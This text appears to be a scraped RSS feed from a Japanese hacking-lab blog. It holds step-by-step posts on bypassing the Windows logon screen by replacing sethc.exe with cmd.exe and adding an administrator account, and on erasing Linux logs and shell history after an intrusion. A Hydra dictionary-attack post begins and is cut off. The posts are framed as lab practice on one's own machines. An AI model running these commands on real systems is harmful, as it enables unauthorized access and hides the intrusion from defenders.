			</div><ul class="rtoc-mokuji mokuji_ul level-1"><li class="rtoc-item"><a href="#rtoc-1">1.目的</a></li><li class="rtoc-item"><a href="#rtoc-2">2.Sticky Keys機能を利用したログオン画面の突破</a></li><li class="rtoc-item"><a href="#rtoc-3">3.実験</a><ul class="rtoc-mokuji mokuji_ul level-2"><li class="rtoc-item"><a href="#rtoc-4">3-1.実験環境</a></li><li class="rtoc-item"><a href="#rtoc-5">3-2.isoファイルを仮想マシンにマウント</a></li><li class="rtoc-item"><a href="#rtoc-6">3-3.isoファイルからブート</a></li><li class="rtoc-item"><a href="#rtoc-7">3-4.プロセスの置き換え</a></li><li class="rtoc-item"><a href="#rtoc-8">3-5.ログオン認証画面でコマンドプロンプト起動</a></li><li class="rtoc-item"><a href="#rtoc-9">3-6.パスワード変更、ユーザ作成</a></li><li class="rtoc-item"><a href="#rtoc-10">3-7.Windowsにログオン</a></li></ul></li><li class="rtoc-item"><a href="#rtoc-11">4.まとめ</a></li><li class="rtoc-item"><a href="#rtoc-12">参考サイト、文献</a></li></ul></div><h2 id="rtoc-1"  class="wp-block-heading">1.目的</h2>



<p>今回の目的はWindowsのログオン認証をハッキングします。<br>自分のWindowsPCのログオンパスワードがわからなくなったときに利用できます。</p>



<p> <span class="bold-red">※注意事項※<br>このブログの記事はセキュリティ向上を目的として、自分の所有する機器に実験を行います。<br>他者の機器やネットワークで試すことは絶対にしないでください。</span><a href="https://eidoblog.com/caution/" data-type="URL" data-id="https://eidoblog.com/caution/">詳しくはこちら</a>  </p>



<h2 id="rtoc-2"  class="wp-block-heading">2.Sticky Keys機能を利用したログオン画面の突破</h2>



<p>Windows端末で[Shift]キーを5回押すと、<strong><span class="marker-under">Sticky Keys機能</span></strong>の確認ダイアログが表示されます。<br>これは[Windows\System32\sethc.exe]というプロセスが起動されており、<br>ログオン画面でも適用されます。<br><img decoding="async" width="450" height="153" class="wp-image-403" style="width: 450px;" src="https://eidoblog.com/wp-content/uploads/2021/12/winlogon00.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/winlogon00.png 503w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon00-300x102.png 300w" sizes="(max-width: 450px) 100vw, 450px" /></p>



<p>このプロセスを[<strong><span class="marker-under">cmd.exe</span></strong>]に置き換えて、ローカルアカウントのパスワードをリセットしたり、<br>新しい管理者ユーザを作ることでログオン認証を突破します。</p>



<p>※Sticky Keys機能とは、補助キー（[Shift]キー、[Ctrl]キー、[Alt]キー、[Win]キー）と他のキーの同時入力が難しいという、身体的ハンディキャップのある人向けのユーザ補助機能です。</p>



<h2 id="rtoc-3"  class="wp-block-heading">3.実験</h2>



<p>[sethc.exe]というプロセスを[cmd.exe]に置き換える作業を<br><strong><span class="marker-under">コンピュータ修復</span></strong>用のプログラムを利用し実施します。<br><br>今回は実験用のWindowsマシンにisoファイルをマウントし、コンピュータ修復を起動します。</p>



<h3 id="rtoc-4"  class="wp-block-heading">3-1.実験環境</h3>



<p>この実験における環境は、次の通りです。</p>



<ul><li>Windows10 仮想マシン</li><li>Windows10 isoファイル</li></ul>



<p>実験用マシン、ファイルの準備方法は以下の記事で紹介しています。</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-reference">

<a href="https://eidoblog.com/windows10-vmware/" title="Windows10構築 ハッキング実験用マシン" class="blogcard-wrap internal-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard internal-blogcard ib-left cf"><div class="blogcard-label internal-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail internal-blogcard-thumbnail"><img decoding="async" width="160" height="99" src="https://eidoblog.com/wp-content/uploads/2021/12/win-1-160x99.jpg" class="blogcard-thumb-image internal-blogcard-thumb-image wp-post-image" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/win-1-160x99.jpg 160w, https://eidoblog.com/wp-content/uploads/2021/12/win-1-120x74.jpg 120w, https://eidoblog.com/wp-content/uploads/2021/12/win-1-320x198.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /></figure><div class="blogcard-content internal-blogcard-content"><div class="blogcard-title internal-blogcard-title">Windows10構築 ハッキング実験用マシン</div><div class="blogcard-snippet internal-blogcard-snippet">ハッキング実験用のWindows10マシンを用意します。安全性を考慮して独立したネットワークに準備したいため、仮想化ソフトにWindowsを構築します。</div></div><div class="blogcard-footer internal-blogcard-footer cf"><div class="blogcard-site internal-blogcard-site"><div class="blogcard-favicon internal-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://eidoblog.com" alt="" class="blogcard-favicon-image internal-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain internal-blogcard-domain">eidoblog.com</div></div><div class="blogcard-date internal-blogcard-date"><div class="blogcard-post-date internal-blogcard-post-date">2021.12.28</div></div></div></div></a>
</div>



<h3 id="rtoc-5"  class="wp-block-heading">3-2.isoファイルを仮想マシンにマウント</h3>



<p>用意したisoファイルを仮想マシンにマウントします。<br><strong><span class="marker-under">[仮想マシン設定] > [CD/DVD(SATA)]</span></strong> からisoファイルを指定し、[OK]をクリックします。<br><img decoding="async" width="500" height="487" class="wp-image-410" style="width: 500px;" src="https://eidoblog.com/wp-content/uploads/2021/12/winlogon07.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/winlogon07.png 819w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon07-300x292.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon07-768x748.png 768w" sizes="(max-width: 500px) 100vw, 500px" /></p>



<h3 id="rtoc-6"  class="wp-block-heading">3-3.isoファイルからブート</h3>



<p>仮想マシンを起動すると、<strong>VMwareの起動画面</strong>が表示されるので<strong><span class="marker-under">[Esc]キー</span></strong>を押下します。<br><img decoding="async" width="500" height="402" class="wp-image-408" style="width: 500px;" src="https://eidoblog.com/wp-content/uploads/2021/12/winlogon05.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/winlogon05.png 1026w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon05-300x241.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon05-1024x823.png 1024w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon05-768x618.png 768w" sizes="(max-width: 500px) 100vw, 500px" /></p>



<p>Boot Managerが表示されるので、<strong><span class="marker-under">CDROM Drive</span></strong>から起動します。<br><img decoding="async" width="500" height="402" class="wp-image-404" style="width: 500px;" src="https://eidoblog.com/wp-content/uploads/2021/12/winlogon01.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/winlogon01.png 1026w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon01-300x241.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon01-1024x823.png 1024w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon01-768x618.png 768w" sizes="(max-width: 500px) 100vw, 500px" /></p>



<p>「Press any key to boot from CD or DVD..」という画面が少しの間でるので、<br>この画面の間に<span class="marker-under"><strong>適当なキーを押下</strong></span>します。<br><img decoding="async" width="500" height="462" class="wp-image-364" style="width: 500px;" src="https://eidoblog.com/wp-content/uploads/2021/12/windows12.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/windows12.png 1017w, https://eidoblog.com/wp-content/uploads/2021/12/windows12-300x277.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/windows12-768x709.png 768w" sizes="(max-width: 500px) 100vw, 500px" /></p>



<h3 id="rtoc-7"  class="wp-block-heading">3-4.プロセスの置き換え</h3>



<p>言語の設定などはデフォルトのまま[次へ]をクリックします。<br><img decoding="async" width="500" height="495" class="wp-image-366" style="width: 500px;" src="https://eidoblog.com/wp-content/uploads/2021/12/windows14.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/windows14.png 1019w, https://eidoblog.com/wp-content/uploads/2021/12/windows14-300x297.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/windows14-150x150.png 150w, https://eidoblog.com/wp-content/uploads/2021/12/windows14-768x760.png 768w, https://eidoblog.com/wp-content/uploads/2021/12/windows14-100x100.png 100w" sizes="(max-width: 500px) 100vw, 500px" /></p>



<p>「今すぐインストール」という画面がでたら、下の「<strong><span class="marker-under">コンピュータを修復</span></strong>」をクリックします。<br><img decoding="async" width="500" height="402" class="wp-image-405" style="width: 500px;" src="https://eidoblog.com/wp-content/uploads/2021/12/winlogon02.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/winlogon02.png 1026w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon02-300x241.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon02-1024x823.png 1024w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon02-768x618.png 768w" sizes="(max-width: 500px) 100vw, 500px" /></p>



<p>[<strong><span class="marker-under">トラブルシューティング</span></strong>] &gt; [<strong><span class="marker-under">コマンドプロンプト</span></strong>]の順にクリックします。<br><img decoding="async" width="500" height="402" class="wp-image-407" style="width: 500px;" src="https://eidoblog.com/wp-content/uploads/2021/12/winlogon04.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/winlogon04.png 1026w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon04-300x241.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon04-1024x823.png 1024w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon04-768x618.png 768w" sizes="(max-width: 500px) 100vw, 500px" /></p>



<p>コマンドプロンプトが表示されるので、次のように入力します。<br>ただし、ドライブが見かけ上変わっていることがあるので注意してください。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">X:\Sources>c:　　　←カレントディレクトリを移動

C:\>cd c:\windows\system32　　　←通常はCドライブ
c:\Windows\System32>copy sethc.exe sethc_old.exe　　　←プロセスのバックアップを作成
　　　　1個のファイルをコピーしました。
c:\Windows\System32>copy cmd.exe sethc.exe　　　←cmd.exeで置き換える(上書きコピー)
sethc.exe を上書きしますか?(Yes/No/All):y　　　←yを入力
　　　　1個のファイルをコピーしました。
c:\Windows\System32></pre>



<p>以下コマンドを入力し、PCを再起動します。</p>



<pre class="wp-block-code"><code>&gt;shutdown /r /t 0</code></pre>



<h3 id="rtoc-8"  class="wp-block-heading">3-5.ログオン認証画面でコマンドプロンプト起動</h3>



<p>再起動後、ログオン認証画面が表示されたら、<strong><span class="marker-under">[Shift]キーを5回押します。</span></strong><br>するとコマンドプロンプトが立ち上がります。（System権限）<br><img decoding="async" width="500" height="402" class="wp-image-414" style="width: 500px;" src="https://eidoblog.com/wp-content/uploads/2021/12/winlogon08.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/winlogon08.png 1026w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon08-300x241.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon08-1024x823.png 1024w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon08-768x618.png 768w" sizes="(max-width: 500px) 100vw, 500px" /></p>



<h3 id="rtoc-9"  class="wp-block-heading">3-6.パスワード変更、ユーザ作成</h3>



<p>・<strong><span class="marker-under">パスワード変更</span></strong><br>ユーザ名がわかっている場合は、パスワードを変更してログオンすることが可能です。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">C:\Windows\System32>net user admin password　　←adminユーザのパスワードをpasswordに上書き
コマンドは正常に終了しました。</pre>



<p><br>・<strong><span class="marker-under-blue">ユーザ作成</span></strong><br>新しく管理者権限のユーザを作成し、そのユーザでログオンします。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">C:\Windows\System32>net user eido eido /add　　←ユーザ/パスワード eidoを作成
コマンドは正常に終了しました。

C:\Windows\System32>net localgroup administrators eido /add　　←ユーザeidoに管理者権限付与
コマンドは正常に終了しました。</pre>



<h3 id="rtoc-10"  class="wp-block-heading">3-7.Windowsにログオン</h3>



<p>上記で<strong>変更したパスワード</strong>、又は<strong>作成したユーザ</strong>でWindowsにログオンします。<br><img decoding="async" width="500" height="402" class="wp-image-415" style="width: 500px;" src="https://eidoblog.com/wp-content/uploads/2021/12/winlogon09.png" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/winlogon09.png 1026w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon09-300x241.png 300w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon09-1024x823.png 1024w, https://eidoblog.com/wp-content/uploads/2021/12/winlogon09-768x618.png 768w" sizes="(max-width: 500px) 100vw, 500px" /></p>



<p>実験は以上です。</p>



<h2 id="rtoc-11"  class="wp-block-heading">4.まとめ</h2>



<p>Windowsログオン認証を突破することができました。<br>また、Sticky Keys機能を元に戻す場合はブートメディアから同じ手順でコマンドプロンプトを起動し、バックアップしたファイルから上書きすれば戻ります。</p>



<h2 id="rtoc-12"  class="wp-block-heading">参考サイト、文献</h2>



<p><a href="https://rpx.a8.net/svt/ejp?a8mat=3HR0N6+CIP5PU+2HOM+BWGDT&amp;rakuten=y&amp;a8ejpredirect=https%3A%2F%2Fhb.afl.rakuten.co.jp%2Fhgc%2Fg00tzgs4.2bo110f3.g00tzgs4.2bo12bcc%2Fa21121298722_3HR0N6_CIP5PU_2HOM_BWGDT%3Fpc%3Dhttps%253A%252F%252Fitem.rakuten.co.jp%252Fpure-tree-trunk%252F202110150324589784798155302%252F%26m%3Dhttp%253A%252F%252Fm.rakuten.co.jp%252Fpure-tree-trunk%252Fi%252F10032940%252F">ハッキング ラボのつくりかた 仮想環境におけるハッカー体験学習</a></p>



<p>価格:<strong>6,335円</strong><br>(2021/12/16 01:03時点)</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>ハッキングの隠蔽 Linuxのログを消去・改ざん</title>
		<link>https://eidoblog.com/log-del/</link>
		
		<dc:creator><![CDATA[エイド]]></dc:creator>
		<pubDate>Tue, 21 Dec 2021 00:00:00 +0000</pubDate>
				<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[ハッキング実験]]></category>
		<guid isPermaLink="false">https://eidoblog.com/?p=287</guid>

					<description><![CDATA[攻撃者はターゲットマシンに侵入後、痕跡を残さないようにします。
ターゲット端末（Metasploiteble2）のログを消去・改ざんを行います。]]></description>
										<content:encoded><![CDATA[
<div id="rtoc-mokuji-wrapper" class="rtoc-mokuji-content frame4 preset5 animation-fade rtoc_open noto-sans" data-id="287" data-theme="Cocoon">
			<div id="rtoc-mokuji-title" class=" rtoc_left">
			<button class="rtoc_open_close rtoc_open"></button>
			<span>目次</span>
			</div><ul class="rtoc-mokuji mokuji_ul level-1"><li class="rtoc-item"><a href="#rtoc-1">1.目的</a></li><li class="rtoc-item"><a href="#rtoc-2">2.ログファイル</a></li><li class="rtoc-item"><a href="#rtoc-3">3.実験</a><ul class="rtoc-mokuji mokuji_ul level-2"><li class="rtoc-item"><a href="#rtoc-4">3-1.実験環境</a></li><li class="rtoc-item"><a href="#rtoc-5">3-2.ログの消去</a></li><li class="rtoc-item"><a href="#rtoc-6">3-3.ログの改ざん</a></li><li class="rtoc-item"><a href="#rtoc-7">3-4.コマンド履歴を消去</a></li></ul></li><li class="rtoc-item"><a href="#rtoc-8">4.まとめ</a></li><li class="rtoc-item"><a href="#rtoc-9">参考サイト、文献</a></li></ul></div><h2 id="rtoc-1"  class="wp-block-heading">1.目的</h2>



<p>攻撃者はターゲットマシンに侵入後、痕跡を残さないようにします。<br>痕跡を残さないことで、アタックを隠蔽したり、追跡を逃れたりできます。<br><br>今回は、ターゲット端末（Metasploiteble2）の<strong>ログを消去・改ざん</strong>を行います。</p>



<p>基本的な攻撃の流れは以下の通りです。<br>1.情報調査ツールを使い、ターゲットの情報を収集<br>2.脆弱なサービスを特定し、侵入<br><strong>3.ハッキングの痕跡を隠蔽　　←今回の実験</strong></p>



<p><span class="bold-red">※注意事項※<br>このブログの記事はセキュリティ向上を目的として、自分の所有する機器に実験を行います。<br>他者の機器やネットワークで試すことは絶対にしないでください。</span><a href="https://eidoblog.com/caution/" data-type="URL" data-id="https://eidoblog.com/caution/">詳しくはこちら</a></p>



<h2 id="rtoc-2"  class="wp-block-heading">2.ログファイル</h2>



<p>Linuxではログファイルの多くが&#8221;<strong>/var/log</strong>&#8220;ディレクトリに格納されています。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─# ls /var/log
apache2             installer            sysstat
apt                 journal              user.log
boot.log.5          messages             vmware-network.7.log
boot.log.6          messages.1           vmware-network.8.log
boot.log.7          messages.2.gz        vmware-network.9.log
........</pre>



<figure class="wp-block-table"><table><thead><tr><th>パス</th><th>説明</th></tr></thead><tbody><tr><td>/var/log/btmp</td><td>ログイン失敗を記録</td></tr><tr><td>/var/log/wtmp</td><td>ログイン成功を記録</td></tr><tr><td>/var/log/lastlog</td><td>最終ログインを記録</td></tr><tr><td>/var/faillog</td><td>ログイン失敗回数を記録</td></tr><tr><td>/var/log/tallylog</td><td>ログイン失敗回数を記録</td></tr><tr><td>/var/log/messages</td><td>システム関連の記録</td></tr><tr><td>/var/log/secure</td><td>セキュリティ関連の記録</td></tr></tbody></table><figcaption>主要なログファイル</figcaption></figure>



<h2 id="rtoc-3"  class="wp-block-heading">3.実験</h2>



<p>前提：ターゲットのroot権限のシェルを奪取済<br>ログファイルを消去・改ざんとコマンド履歴削除の実験を行います。</p>



<h3 id="rtoc-4"  class="wp-block-heading">3-1.実験環境</h3>



<p>この実験における環境は、次の通りです。</p>



<pre class="wp-block-verse">・Kali Linux（攻撃用マシン）<br>名前：kali<br>IPアドレス：192.168.238.128/24<br><br>・Metasploitable2（ターゲットマシン）<br>名前：metasploitable<br>IPアドレス：192.168.238.130/24</pre>



<p>※実験用マシンの準備は以下ご参照ください。</p>



<p>　　・攻撃用マシン（Kali Linux）の構築</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-together">

<a href="https://eidoblog.com/kali-vmware/" title="Kali Linux 2021.2 構築 攻撃用マシン" class="blogcard-wrap internal-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard internal-blogcard ib-left cf"><div class="blogcard-label internal-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail internal-blogcard-thumbnail"><img decoding="async" width="160" height="90" src="https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-160x90.jpg" class="blogcard-thumb-image internal-blogcard-thumb-image wp-post-image" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-160x90.jpg 160w, https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-120x68.jpg 120w, https://eidoblog.com/wp-content/uploads/2021/12/hacker-g31ccbac85_1920-320x180.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /></figure><div class="blogcard-content internal-blogcard-content"><div class="blogcard-title internal-blogcard-title">Kali Linux 2021.2 構築 攻撃用マシン</div><div class="blogcard-snippet internal-blogcard-snippet">ハッキングの実験をするにあたって、攻撃用マシンの準備を行います。Kali Linuxの準備、基本設定を実施します。</div></div><div class="blogcard-footer internal-blogcard-footer cf"><div class="blogcard-site internal-blogcard-site"><div class="blogcard-favicon internal-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://eidoblog.com" alt="" class="blogcard-favicon-image internal-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain internal-blogcard-domain">eidoblog.com</div></div><div class="blogcard-date internal-blogcard-date"><div class="blogcard-post-date internal-blogcard-post-date">2021.12.09</div></div></div></div></a>
</div>



<p>　　・ターゲットマシン（Metasploitable2）の構築</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-together">

<a href="https://eidoblog.com/metasploitable-vmware/" title="Metasploitable2構築 ターゲットマシン" class="blogcard-wrap internal-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard internal-blogcard ib-left cf"><div class="blogcard-label internal-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail internal-blogcard-thumbnail"><img decoding="async" width="160" height="99" src="https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-160x99.jpg" class="blogcard-thumb-image internal-blogcard-thumb-image wp-post-image" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-160x99.jpg 160w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-300x188.jpg 300w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-1024x640.jpg 1024w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-768x480.jpg 768w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-1536x960.jpg 1536w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-120x74.jpg 120w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920-320x198.jpg 320w, https://eidoblog.com/wp-content/uploads/2021/12/security-g6095f0aee_1920.jpg 1920w" sizes="(max-width: 160px) 100vw, 160px" /></figure><div class="blogcard-content internal-blogcard-content"><div class="blogcard-title internal-blogcard-title">Metasploitable2構築 ターゲットマシン</div><div class="blogcard-snippet internal-blogcard-snippet">ハッキングの実験をするにあたって、攻撃先マシンの準備を行います。Metasploitable2の準備、基本設定を実施します。</div></div><div class="blogcard-footer internal-blogcard-footer cf"><div class="blogcard-site internal-blogcard-site"><div class="blogcard-favicon internal-blogcard-favicon"><img decoding="async" src="https://www.google.com/s2/favicons?domain=https://eidoblog.com" alt="" class="blogcard-favicon-image internal-blogcard-favicon-image" width="16" height="16" /></div><div class="blogcard-domain internal-blogcard-domain">eidoblog.com</div></div><div class="blogcard-date internal-blogcard-date"><div class="blogcard-post-date internal-blogcard-post-date">2021.12.11</div></div></div></div></a>
</div>



<h3 id="rtoc-5"  class="wp-block-heading">3-2.ログの消去</h3>



<p>もっとも簡単な隠蔽方法は、ディレクトリ内のログファイルを削除してしまうことです。<br>（ファイルが消えていれば、すぐにバレる可能性があります。）</p>



<p>rmコマンドではファイルの内容は完全に消えないため、<br><span class="marker-under">shredコマンド</span>を使って、データが復旧できないように完全削除します。<br>以下コマンドを実行します。</p>



<pre class="wp-block-verse"># shred -n 3 -zu /var/log/messages</pre>



<p>-n：ランダム情報を書き込む回数<br>-z：最後にゼロを書き込む<br>-u：shred終了後にファイルを削除する</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─# ls /var/log
apache2             installer            user.log
apt                 journal              vmware-network.7.log
boot.log.5          messages.1           vmware-network.8.log
boot.log.6          messages.2.gz        vmware-network.9.log
boot.log.7          sysstat
........
....</pre>



<p>&#8220;messages&#8221;が消去されました。</p>



<h3 id="rtoc-6"  class="wp-block-heading">3-3.ログの改ざん</h3>



<p>ファイルの中身だけをクリアする方法です。<br>リダイレクトの「&gt;」の左側に何も入力せずに実行します。</p>



<pre class="wp-block-verse"># > /var/log/messages</pre>



<p>ファイルの内容だけがクリアされ、ファイルだけが残ります。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─# cat /var/log/messages
Dec 15 06:44:35 kali lightdm[534]: Error getting user list from org.freedesktop.Accounts: GDBus.Error:org.freedesktop.DBus.Error.ServiceUnknown: The name org.freedesktop.Accounts was not provided by any .service files
Dec 15 06:44:35 kali kernel: [   23.029451] e1000: eth0 NIC Link is Up 1000 Mbps Full Duplex, Flow Control: None
..............
.........</pre>



<p class="has-text-align-center"><strong>↓</strong></p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">─# > /var/log/messages
^C
─# cat /var/log/messages
　　　</pre>



<h3 id="rtoc-7"  class="wp-block-heading">3-4.コマンド履歴を消去</h3>



<p>Linuxではコマンドを入力すると、&#8221;<strong>.bash_history</strong>&#8220;に履歴が記録されます。<br>コマンド履歴から攻撃内容がバレる可能性があるため、隠蔽します。<br>※[↑]キーを入力時にコマンドが表示される</p>



<p>まずデフォルトで1000コマンド記録されますが、これを0に変更します。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">-# echo $HISTSIZE
1000
-# export HISTSIZE=0
-# echo $HISTSIZE
0</pre>



<p>これで新たなコマンドの履歴は記録されません。 そのうえ、コマンド履歴内容を改ざんします。</p>



<pre class="EnlighterJSRAW" data-enlighter-language="raw" data-enlighter-theme="" data-enlighter-highlight="" data-enlighter-linenumbers="" data-enlighter-lineoffset="" data-enlighter-title="" data-enlighter-group="">-# > ~/.bash_history
  </pre>



<p>これでコマンド履歴が消去されました。</p>



<p>実験は以上です。</p>



<h2 id="rtoc-8"  class="wp-block-heading">4.まとめ</h2>



<p>今回はLinuxのログを消去・改ざんする実験を行いました。<br>このように攻撃者は痕跡を巧妙に消すため、ログ管理システムなどを使用し、<br>ログを安全に保管する必要があります。</p>



<h2 id="rtoc-9"  class="wp-block-heading">参考サイト、文献</h2>



<p><a href="https://rpx.a8.net/svt/ejp?a8mat=3HR0N6+CIP5PU+2HOM+BWGDT&amp;rakuten=y&amp;a8ejpredirect=https%3A%2F%2Fhb.afl.rakuten.co.jp%2Fhgc%2Fg00tzgs4.2bo110f3.g00tzgs4.2bo12bcc%2Fa21121298722_3HR0N6_CIP5PU_2HOM_BWGDT%3Fpc%3Dhttps%253A%252F%252Fitem.rakuten.co.jp%252Fpure-tree-trunk%252F202110150324589784798155302%252F%26m%3Dhttp%253A%252F%252Fm.rakuten.co.jp%252Fpure-tree-trunk%252Fi%252F10032940%252F">ハッキング ラボのつくりかた 仮想環境におけるハッカー体験学習</a></p>



<p>価格:<strong>6,335円</strong><br>(2021/12/16 01:03時点)</p>
]]></content:encoded>
					
		
		
			</item>
		<item>
		<title>Hydraを使った辞書攻撃でアカウント、パスワードをハッキング</title>
		<link>https://eidoblog.com/hydra-dictionaryattack/</link>
		
		<dc:creator><![CDATA[エイド]]></dc:creator>
		<pubDate>Sat, 18 Dec 2021 00:00:00 +0000</pubDate>
				<category><![CDATA[セキュリティ]]></category>
		<category><![CDATA[ハッキング実験]]></category>
		<guid isPermaLink="false">https://eidoblog.com/?p=264</guid>

					<description><![CDATA[Hydraを使い、Kali LinuxからターゲットマシンのFTPアカウントとSSHアカウントの
ユーザ名、パスワード解析を実験します。]]></description>
										<content:encoded><![CDATA[
<div id="rtoc-mokuji-wrapper" class="rtoc-mokuji-content frame4 preset5 animation-fade rtoc_open noto-sans" data-id="264" data-theme="Cocoon">
			<div id="rtoc-mokuji-title" class=" rtoc_left">
			<button class="rtoc_open_close rtoc_open"></button>
			<span>目次</span>
			</div><ul class="rtoc-mokuji mokuji_ul level-1"><li class="rtoc-item"><a href="#rtoc-1">1.目的</a></li><li class="rtoc-item"><a href="#rtoc-2">2.Hydra</a></li><li class="rtoc-item"><a href="#rtoc-3">3.実験</a><ul class="rtoc-mokuji mokuji_ul level-2"><li class="rtoc-item"><a href="#rtoc-4">3-1.実験環境</a></li><li class="rtoc-item"><a href="#rtoc-5">3-2.実験の用意</a></li><li class="rtoc-item"><a href="#rtoc-6">3-3.実験開始</a></li></ul></li><li class="rtoc-item"><a href="#rtoc-7">4.まとめ</a></li><li class="rtoc-item"><a href="#rtoc-8">参考サイト、文献</a></li></ul></div><h2 id="rtoc-1"  class="wp-block-heading">1.目的</h2>



<p>Hydraを使い、ターゲットマシンのFTPアカウントとSSHアカウントの<br>ユーザ名、パスワードを解析します。</p>



<p>基本的な攻撃の流れは以下の通りです。<br>1.情報調査ツールを使い、ターゲットの情報を収集　←nmapで収集<br><strong>2.空いているポートに対し攻撃　　　　　　　　　　←今回の実験</strong></p>



<p>　　nmapでの情報収集は以下の記事をご覧ください。</p>



<div class="wp-block-cocoon-blocks-blogcard blogcard-type bct-together">

<a href="https://eidoblog.com/nmap/" title="Nmapでポートスキャンの実験&lt;br&gt;Kali Linux ツール" class="blogcard-wrap internal-blogcard-wrap a-wrap cf" target="_blank"><div class="blogcard internal-blogcard ib-left cf"><div class="blogcard-label internal-blogcard-label"><span class="fa"></span></div><figure class="blogcard-thumbnail internal-blogcard-thumbnail"><img decoding="async" width="160" height="99" src="https://eidoblog.com/wp-content/uploads/2021/12/1826323_s-160x99.jpg" class="blogcard-thumb-image internal-blogcard-thumb-image wp-post-image" alt="" srcset="https://eidoblog.com/wp-content/uploads/2021/12/1826323_s-160x99.jpg 160w, https://eidoblog.com/wp-content/uploads/2021/12/1826323_s-120x74.jpg 120w, https://eidoblog.com/wp-content/uploads/2021/12/1826323_s-320x198.jpg 320w" sizes="(max-width: 160px) 100vw, 160px" /></figure><div class="blogcard-content internal-blogcard-content"><div class="blogcard-title internal-blogcard-title">Nmapでポートスキャンの実験<br>Kali Linux ツール</div><div class="blogcard-snippet 